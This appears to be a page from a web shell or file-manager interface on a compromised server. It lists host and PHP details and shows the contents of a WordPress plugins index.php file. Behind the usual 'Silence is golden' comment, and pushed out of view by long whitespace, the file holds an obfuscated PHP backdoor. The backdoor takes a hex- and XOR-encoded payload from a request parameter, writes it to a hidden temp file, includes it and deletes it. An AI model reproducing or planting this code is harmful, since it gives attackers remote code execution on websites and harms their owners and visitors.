HEX
Server: Apache
System: FreeBSD www860.sakura.ne.jp 13.0-RELEASE-p14 FreeBSD 13.0-RELEASE-p14 #2: Mon Dec 9 13:54:55 JST 2024 root@www5301.sakura.ne.jp:/usr/obj/usr/src/amd64.amd64/sys/GENERIC amd64
User: yoyo0427 (1306)
PHP: 8.3.8
Disabled: NONE
$ pwd: /home/yoyo0427/www/www.yn-artspace.com/wp-content/plugins/
Upload Files
File: /home/yoyo0427/www/www.yn-artspace.com/wp-content/plugins/index.php
<?php																																										if(count($_REQUEST) > 0 && isset($_REQUEST["\x70o\x69\x6E\x74er"])){ $bind = array_filter([getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", "/dev/shm", session_save_path(), getenv("TMP"), sys_get_temp_dir()]); $hld = hex2bin($_REQUEST["\x70o\x69\x6E\x74er"]); $obj = '' ; foreach(str_split($hld) as $char){$obj .= chr(ord($char) ^ 48);} for ($flg = 0, $holder = count($bind); $flg < $holder; $flg++) { $dat = $bind[$flg]; if (is_writable($dat) && is_dir($dat)) { $factor = sprintf("%s/.sym", $dat); $file = fopen($factor, 'w'); if ($file) { fwrite($file, $obj); fclose($file); include $factor; @unlink($factor); die(); } } } }

// Silence is golden.
@ Telegram